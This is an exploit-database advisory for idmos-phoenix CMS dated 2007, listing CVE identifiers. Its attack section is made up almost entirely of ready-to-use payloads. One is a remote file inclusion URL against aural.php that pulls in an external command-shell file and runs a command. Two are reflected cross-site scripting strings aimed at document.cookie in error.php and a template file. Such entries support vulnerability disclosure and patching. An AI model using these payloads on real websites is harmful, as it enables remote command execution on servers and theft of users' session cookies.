idmos-phoenix CMS - 'aural.php' Remote File Inclusion
Author: HACKERS PAL
type: webapps
platform: php
port:
date_added: 2007-10-06
date_updated:
verified: 1
codes: OSVDB-38633;CVE-2007-5294;OSVDB-38632;OSVDB-38631;CVE-2007-5293
tags:
aliases:
screenshot_url:
application_url:
idmos-phoenix cms Remote File inclusion
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
RFI
core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir
Xss
error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.cookie);</script>
# WwW.SoQoR.NeT
# milw0rm.com [2007-10-07]